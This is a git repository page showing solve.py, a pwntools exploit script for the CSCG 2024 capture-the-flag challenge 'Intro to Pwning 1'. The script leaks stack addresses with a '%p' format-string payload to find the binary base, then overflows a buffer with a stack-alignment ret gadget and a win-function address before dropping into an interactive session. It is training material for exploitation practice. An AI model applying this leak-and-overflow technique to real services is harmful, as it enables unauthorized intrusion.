cscg24-pwn

CSCG 2024 Challenge 'Intro to Pwning 1'
git clone https://git.sinitax.com/sinitax/cscg24-pwn
Log | Files | Refs | sfeed.txt

solve.py (1010B)

      1from pwn import *
      2import os
      3
      4if args.debug:
      5    p = process("ncat localhost 1024".split())
      6else:
      7    if len(sys.argv) < 2:
      8        print("USAGE: exploit.py <ID>")
      9        sys.exit(1)
     10    p = process("ncat --ssl {}-1024-intro-pwn-1.challenge.cscg.live 1337"
     11            .format(sys.argv[1]).split())
     12
     13p.recvuntil(b"Enter your witch name:")
     14
     15p.sendline(b"%p " * 50)
     16
     17leaked = p.recvuntil(b"enter your magic spell:")
     18leak_vals = leaked.decode().split(" ")
     19
     20for i,v in enumerate(leak_vals):
     21    print(i, "->", v)
     22
     23base = int(leak_vals[41], 16) - 2537
     24win = base + 0x9ec
     25extra_ret = base + 0x0b2d
     26
     27print("RERET:", hex(extra_ret))
     28print("WIN:", hex(win))
     29
     30# Why do we need to realign the stack with another return?
     31
     32# The `movaps xmmword ptr` instruction requires the stack pointer to be
     33# 16 byte aligned. Because of this we need to return twice, such that
     34# the stack pointer moves down another 8 bytes.
     35
     36p.send("Expelliarmus\x00" + "A" * 251)
     37p.send(p64(extra_ret))
     38p.send(p64(win))
     39p.send("\n")
     40
     41p.interactive()